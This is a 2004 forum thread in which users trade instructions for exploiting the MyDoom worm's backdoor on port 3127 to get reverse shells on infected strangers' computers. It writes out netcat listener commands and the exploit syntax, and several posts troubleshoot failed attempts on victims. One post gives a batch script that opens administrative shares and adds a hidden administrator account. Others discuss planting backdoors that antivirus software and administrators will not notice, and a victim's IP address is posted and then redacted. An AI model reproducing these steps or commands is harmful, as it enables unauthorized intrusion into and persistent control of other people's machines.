By the way guys in here... Don't use those exploits/tools on other computers than your own/or testing it with friends... And for those that didn't know that I'm not a blackhat, they know it now: I'm a 99.9999% whitehat security coder/whatsoever. And please, I don't help to hack, I help to find the vulnerabilities so the big companies, virus scanners etc. can protect the computers from getting caught... A good thing I did do on some friends was this: I just uploaded the fixer via my tool and whooops, MyDoom and of course the backdoor was gone. Help me clean the MyDoom's away and start DELETING the MyDoom viruses. For those that don't do this, they aren't under my respect... Thanks
i do it for my school that's why i got A in computers hehe
Vosgia
Feb 11 2004, 08:17 AM
every server where i get in, i make and will make a folder on the desktop " HACKED .... plz secure again the mydoom virus" so i think i will help many firms, private people who didn't secure their servers yet.
tba
Feb 11 2004, 08:38 AM
and also 99.99999% is patched because this virus was broadcasted all over the world so people are patching like hell.
Exploits like rpc and wks or dameware don't go on air, so it takes longer for ppl to patch their pc's
greetz TBA
eXist
Feb 11 2004, 09:12 AM
Do you have file extensions turned on? All this stuff works fine, except if you have no admin rights. BTW excellent work sPiKie, your compiled code is working no probs
QuadMedic
Feb 11 2004, 11:34 AM
this thing is dead ...... to tell the truth it was never really alive....
Pgame
Feb 11 2004, 03:32 PM
very nice post
lets test ...
hitu
Feb 11 2004, 04:56 PM
works good.. nice exploit..
zarp
Feb 11 2004, 05:12 PM
yeah nice thx for sharing
jos40
Feb 11 2004, 06:37 PM
very good indeed a lot of vulnerable servers i got with my first scan
Arnie
Feb 11 2004, 08:05 PM
yep great thing, guess people hacked a lot of pr0n browsing students on phat pipes
Kynroxes
Feb 11 2004, 09:03 PM
coromputer pawa !!
Milka
Feb 11 2004, 10:14 PM
I agree with Spikie but then if you want this purely for security then you wouldn't post it here...
btw most ISPs have port 3127 blocked already ;)
Milka
Feb 11 2004, 10:16 PM
QUOTE (QuadMedic @ Feb 11 2004, 11:34 AM)
this thing is dead ...... to tell the truth it was never really alive....
I don't know what you mean by alive, but the worm itself is still alive and kickin' the only thing is... you can't exploit it.... mydoom.b is maybe more active then
MysteryMan
Feb 11 2004, 11:31 PM
uuuu dead ..... :/ but lovesun is good ...
peace ...
HAnzsz
Feb 12 2004, 10:29 AM
hmmmm maybe I am trying to exploit applications
but I haven't exploited a single ip with port 3127 open, too bad
KeKeTTe
Feb 12 2004, 11:52 PM
nice exploit , i will test it big thx kiss
Fooldj
Feb 13 2004, 02:45 AM
hm..thnx for this, i'll have to test it out, also seen another reverse shell program for this also, haven't tested it yet tho
XeviL
Feb 13 2004, 09:43 AM
I have a problem. When i upload a shell with my ip and port 8080 and set netcat listening on my computer on port 8080 then that does nothing. WHY??
caze
Feb 13 2004, 10:51 AM
maybe there is a firewall?
mathofaka
Feb 13 2004, 06:28 PM
i am clueless... i dont know the steps.. any one can help me plz do.. if u cant reach me then email it to jzthug44@yahoo.com
WaZa
Feb 13 2004, 08:50 PM
you (filtered) n00bs, just leave it. its even pointless to moan and cry over it now. if u can read a (filtered) 12 page thread and figure out how to do it, u probably never will. most people who arent getting a shell probably need to set port forwarding and the other half, the new worm has been patching most of the systems so only a few thousands remain, so the odds are very low.
Gargamel
Feb 13 2004, 09:33 PM
QUOTE
you (filtered) n00bs, just leave it. its even pointless to moan and cry over it now. if u can read a (filtered) 12 page thread and figure out how to do it, u probably never will. most people who arent getting a shell probably need to set port forwarding and the other half, the new worm has been patching most of the systems so only a few thousands remain, so the odds are very low.
Rofl but its right what he said...
cye
Feb 14 2004, 02:36 AM
Hi!
The exploit/technique worx great. At least with MyDoom.A. Could anybody send me MyDoom.B, C and/or Doomjuice.B for testing? (Please zip them with password written in the mail, 'cause my server deletes the virus files.) Does this thing work with the new variants too? (With the appropriate ports of course.) Or has the password changed?
Thx: Cye (cziber@ludens.elte.hu)
mofo
Feb 14 2004, 03:02 AM
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
slb33
Feb 14 2004, 04:12 AM
port 666 is not the correct port to connect to the victim. 666 is the port that it is going to connect back to you on!
mofo
Feb 14 2004, 04:30 AM
so how do i do this, i will gladly reward anyone that helps me
Nexcess
Feb 14 2004, 05:06 AM
Give up, ffs, give up, its dead, its been dead for 48 hours now. The worm stopped propagating on the 12th, the ones that weren't hacked and patched to prevent rehacking have been cleaned by av, or the new worm (stupid anti-worm worms).
MattMannLT
Feb 14 2004, 06:21 AM
QUOTE (mofo @ Feb 14 2004, 03:02 AM)
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
its not
CODE
mykalor.exe <victims ip> port 666 shell.exe
its
CODE
mykalor.exe <victims ip> 666 shell.exe
wheres my reward
Alien
Feb 14 2004, 08:36 AM
QUOTE (MattMannLT @ Feb 14 2004, 06:21 AM)
QUOTE (mofo @ Feb 14 2004, 03:02 AM)
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
its not
CODE
mykalor.exe <victims ip> port 666 shell.exe
its
CODE
mykalor.exe <victims ip> 666 shell.exe
wheres my reward
you wrong
its
CODE
mykalor.exe <victims ip> PORT c:\directory\shell.exe
Gargamel
Feb 14 2004, 10:25 AM
no thats wrong, i do it with mykralor.exe IP PORT blub.exe and it works...
oYost
Feb 14 2004, 02:57 PM
Just a thing for thoses who can't use the reverse shell : share IPC on the computer with a bat like this :
CODE
net share IPC$ net share C$=c: net share ADMIN$ net user LocalInternet YourPAss /add net localgroup Administrators LocalInternet /add exit
I think it won't work on the XP system computers, but will on the others
I hope it's working (this exploit doesn't want to work with me ^^ so i can't test) and it's a great share Spikie
Trojan^kid
Feb 14 2004, 04:02 PM
nice Exploit thanks man, i have scanned on port 3127, didn't find any one yet, thanks again
ma5t3r
Feb 14 2004, 04:35 PM
hi
thx its n1ce and the best it works ;-)
thx
MattMannLT
Feb 14 2004, 04:44 PM
QUOTE (Alien @ Feb 14 2004, 08:36 AM)
QUOTE (MattMannLT @ Feb 14 2004, 06:21 AM)
QUOTE (mofo @ Feb 14 2004, 03:02 AM)
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
its not
CODE
mykalor.exe <victims ip> port 666 shell.exe
its
CODE
mykalor.exe <victims ip> 666 shell.exe
wheres my reward
you wrong
its
CODE
mykalor.exe <victims ip> PORT c:\directory\shell.exe
well i have mine in the same directory as mrkralor and it works fine so i guess if it was in a different directory you should put the path to it
DyNaMiTe
Feb 14 2004, 05:06 PM
Axaxa nice work, kralor is the best i think!! Hey you there is not port 3127 (is a joke)) Read carefully. Nice post!!
koursky
Feb 20 2004, 08:16 PM
first thanks a lot for this information but i have a question: is it possible that with my router i couldn't receive the remote shell? thx
iFan
Feb 20 2004, 11:41 PM
no you have to open the port 3127 ... or the port where you want to get a shell
(sry 4 my engl)
greetz
Junta
Feb 20 2004, 11:48 PM
I have a problem 1 Run netcat 'nc.exe -l -vv -p 3127' after run rsCRPT < my ip > listening port (3127) Create file save ( junta ) after run exploit mykralor mykralor < ip victim > 3127 junta
[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.
ok send file
listening port i see
and nothing
what the problem ?
sylver
Feb 20 2004, 11:54 PM
u have to use another port than 3127, try 3128 or something in ur shell, because mydoom is running on 3127<<this port u have to scan
Yemoke
Feb 20 2004, 11:55 PM
I don't know what's your problem but mydoom is dead already, the mydoom.a and b are replaced with mydoom.c, that one doesn't have a backdoor so the port stays open but the file isn't executed when you upload it.... (sorry for bad english)
sylver
Feb 21 2004, 12:12 AM
yes its really dead the same as dameware exploit :*(
dongfangshuo
Feb 21 2004, 05:46 AM
i have used it, it works, but i want to know how to add parameters of the exe i want to execute
Pro21
Feb 21 2004, 09:32 AM
The Mydoom backdoor automatically executes the exe sent. With the Kralor exploit you send a little exe compiled with rsCRPT which opens a shell. And the backdoor automatically executes the exe sent. If you want to upload another file use another exploit without space limitation to send the file. (you can upload a backdoor for example)
dongfangshuo
Feb 21 2004, 11:41 AM
there is a troubling thing, that most of my backdoors are deleted by the antivirus, so i want to upload and execute software such as radmin or remote anything, but this software will add an icon in the banner so it will be killed by the administrator
Pro21
Feb 21 2004, 12:03 PM
It's why you must use the kralor shell generator ....
Junta
Feb 21 2004, 12:18 PM
QUOTE (Junta @ Feb 20 2004, 11:48 PM)
I have a problem 1 Run netcat 'nc.exe -l -vv -p 3127' after run rsCRPT < my ip > listening port (3127) Create file save ( junta ) after run exploit mykralor mykralor < ip victim > 3127 junta
[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.
ok send file
listening port i see
and nothing
what the problem ?
I have changed the port of rsCRPT, port: 666
i always have this problem
after, i connect with telnet
telnet ip victim 666
failed connection :/ why???
Testing this ip victim
XX.XX.XX.XX <=== Mydoom - IP address edited by shaun2k2
jpno5
Feb 22 2004, 09:44 AM
y r u posting someones ip in an open forum that shouldnt b allowed
QUOTE
yes its really dead the same as dameware exploit :*(
dameware isnt dead i can assure u
shaun2k2
Feb 22 2004, 10:14 AM
Stop posting people's IP addresses on this forum. This board was designed for government officials and anyone interested in computer security to hang out, have a laugh, and learn from other kind members here. Members are allowed indefinitely to discuss exploits and their usage, but when you jeopardise people's computer systems, you take it too far. Posting an IP address which is obviously infected is a stupidly irresponsible thing to do, and you know better.
This discussion can continue, but please keep it professional, that's what we are; mature adults. This is quite an interesting discussion so far, but please don't ask for step by step instructions. Remember guys; sometimes exploits are deliberately crippled. Ask yourself why.
-Shaun.
Gangster*
Feb 23 2004, 08:04 AM
Hi thanks for the exploit!
Is there a scanner that checks to see if it is exploitable or not? not just a port scanner.
Thanks again!